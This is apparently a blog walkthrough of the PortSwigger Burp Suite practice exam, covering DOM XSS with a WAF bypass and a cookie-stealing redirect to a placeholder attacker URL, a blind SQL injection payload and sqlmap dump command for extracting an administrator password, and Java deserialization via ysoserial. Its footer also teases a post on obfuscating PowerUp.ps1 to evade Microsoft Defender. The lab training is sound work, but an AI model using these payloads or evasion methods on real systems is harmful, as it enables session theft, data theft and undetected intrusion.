Portswigger Practice Exam #1


Portswigger Practice Exam #1

In this blogpost we will see how to complete The Burp Suite Pratice Exam by Portswigger
We have 2 hours to complete the exam. The Exam itself is made up of three steps, in each of which we have to exploit a different vulnerability.


Steps:
  • DOM Cross-Site Scripting (XSS)
  • SQL Injection
  • Insecure Desearilization

Step #0: Starting the exam

At the bottom of this page, we can start either the first or the second exam.



Let's start the first one by clicking on the first orange button.



Let's click on the next button to confirm to start the practice exam.



Now let's wait a few minutes to let the lab load up.




Step #1: DOM Cross-Site Scripting (XSS)Finally, let's click on the App 1 Button to load the exam webpage.




Let's enable the DOM Invader Extension



Let's use the Dom invader to identify the Sink(s)




Let's validate that we can exploit this sink with the following payload "-alert()-" to achieve a DOM XSS


Let's try to read the cookie using this JavaScript payload "-alert(document.cookie)-".



As we can see, the payload is blocked by a WAF. Since the "-alert()-" is not blocked, we can suppose that something about the string document.cookie is triggering the WAF, blocking us.


Let's keep in mind what we want to do. We want to redirect a victim user to our server in order to steal his or her cookie(s). To achieve this, we could often use the following payload "-location='<ATTACKER_URL>'+document.cookie-", but since we are unable to use the string document.cookie, we need to find another way to achieve our objective.


To overcome our issue, we can combine both the eval and the atob JavaScript functions, using this payload

        • "-eval(atob('BASE_64_PAYLOAD'))-"


Let's test our payload on ourselves to confirm that our approach is valid.



Perfect, it's working well, and we got our cookie reflected in the URL bar.



Now, let's use the Exploit server to send our payload to the victim and finally get his cookies.


Viewing the logs, we can see how the victim got redirected to our Exploit server and how we have stolen his session cookie.



Now let's inject the cookies we have stolen into our browser.



Now, after refreshing the webpage, we can see that we are logged as the user Carlos.



We have completed step 1, let's continue to step 2.

Step #2a: SQL Injection (Manual)

Since the only new available functionality is the "Advanced research" one, we can assume that we have to exploit it.



To identify the presence of a probable SQL Injection, we can repeat a request, adding a hyphen to each parameter.



From the error in the screenshot above, we can assume that the database is PostgreSQL. To confirm that we can achieve a SQL Injection, let's try with the following
payload: ;SELECT PG_SLEEP(5);


It Worked! We can confirm that we have found a valid SQL Injection since the request took roughly 5 seconds or 5000 milliseconds.

Now let's manually exfiltrate the administrator's password, assuming that it is stored in the table named users. We will achieve this using the intruder.

But, first let's set up the Intruder properly:
  • Attack type: Cluster bomb attack
  • Resource Pool: Default
  • Payload 1: Number 1-20
  • Payload 2: [A-Za-z0-9]
  • Matching expression: by zero
  • Payload: ;select+case+when+(username%3d'administrator'+and+substring(password,1,1)%3d'a')+then+1/(SELECT+0)+else+1/(SELECT+1)+end+from+users;







Let's do the log-out and then log in as the user 'administrator' with the exfiltrated password.


Step #2b: SQL Injection (Automated)

Since we can use sqlmap or ghauri during the exam, let's try to exploit the SQL Injection using one of them.

Command:
  • sqlmap 
    • The command itself
  • -u 'https://0ae700f304a3ce9e86a8a27800340006.web-security-academy.net/advanced_search?SearchTerm=test&organize_by=DATE&blogArtist=' 
    • the URL to test
  • --cookie '<cookie_value>' 
    • the _lab cookie
  • --cookie '--cookie '<cookie_value>''
    •  the session cookie
  • --dbms=psql 
    • to test only PostgreSQL payload
  • --batch
    •  to automate the process
  • --technique E 
    • to use only ERROR base technique since those dump quicker than the blind ones
  • --level=5 
    • increase the amount of payload
  • -p organize_by 
    • specify which parameter to test
  • --dump 
    • specify to dump the whole database

Step #3: Insecure Desearilization

The only new attack surface is the admin panel. Let's focus on that to complete the Exam



Looking at the request to the /admin endpoint, we can see that there is a new base64 cookie. Let's see what we can achieve with it!



Let's start decoding it with Burp's decoder URL-Decode-->Base64 Decode.



With a quick research on the internet, we can see that the bytes 1F 8B are the signature of the gzip archive format.



Adding another decoding step we can see that this is a Java serialazible object that uses the CommonCollection



Let's install the "Java Deserialization Scanner" Extension



Let's send the /admin endpoint to the Java Deserialization Scanner Tab and let's configure it.



Let's specify the ysoserial path



Let's test if the cookie is an exploitable target



Since the cookie is a valid vector, let's read the content of /home/carlos/secret to complete the Exam



Let's Read the content from the collaborator tab



Let's submit the value to complete the lab



Congratulations, you have solved the lab!


Commenti

Posta un commento

Post popolari in questo blog

From SAST to CVE-2025-46337

Immagine
 From SAST to CVE-2025-46337 From the start of my career in cybersecurity, I have always worked as a black box pentester. Since I believe that learning new topics is always a good use of my time and that I should increase my knowledge of white box pen testing, I decided to explore the Static Analysis Security Testing (SAST) topic. I started my journey into SAST using the well-known tool SonarQube. To practice with the tool and to become familiar with the GUI and the mechanisms that are behind it, I decided to analyze the code of a few known projects. I chose two projects to analyze. The first one is "Moodle", a very well-known open-source project whose main purpose is to create websites for universities. The second is VtigerCRM, a familiar project on which I discovered several CVEs last summer. I started the SAST first against the source code of Moodle and then against the source code of VtigerCRM. Surprisingly, SonarQube found an SQL Injection on both projects! Since the sou...
Continua a leggere

CVE-2025-45878,CVE-2025-45879 and CVE-2025-45880 Showcase

CVE-2025-45878,CVE-2025-45879 and CVE-2025-45880 Showcase This blog post is written to showcase the three CVEs I discovered in the web application Amigdala 2.2.6 by Miliaris. For this time, I'll stick with the Mitre Template, and I will avoid releasing any sensitive information. CVE-2025-45878 ( Mitre ) ( NVD ) [Suggested description] A reflected cross-site scripting (XSS) vulnerability in the report manager function of Miliaris Amigdala v2.2.6 allows attackers to execute arbitrary HTML in the context of a user's browser via a crafted payload.
Continua a leggere

Case of Study : Hide PowerUp.ps1 from MS Defender

Immagine
Hide PowerUp.ps1 from MS Defender PowerUp.ps1 is a well-known script among pentesters for escalating local privileges. However, since it is fairly old and quite popular, Microsoft Defender detects it as malicious. To use it, we need to either create a custom version of the script or obfuscate the one available online. In this guide, we will use a minimal obfuscation approach. By making small changes to the script, we can bypass Microsoft Defender’s detection and use the script without any issues. What We need A Windows VM with the AV Signatures Updated The PowerUp.ps1 Script ( here ) The Tool DefenderCheck made by matterpreter ( here ) Notepad Let's Start The first step is to disable Microsoft Defender temporarily so we can download the PowerUp.ps1 script without interference. After disabling Windows Defender, go to the GitHub page that contains the raw version of PowerUp.ps1. Copy the content and save it in Notepad with a .ps1 extension. Once you have downloaded both the PowerUp ...
Continua a leggere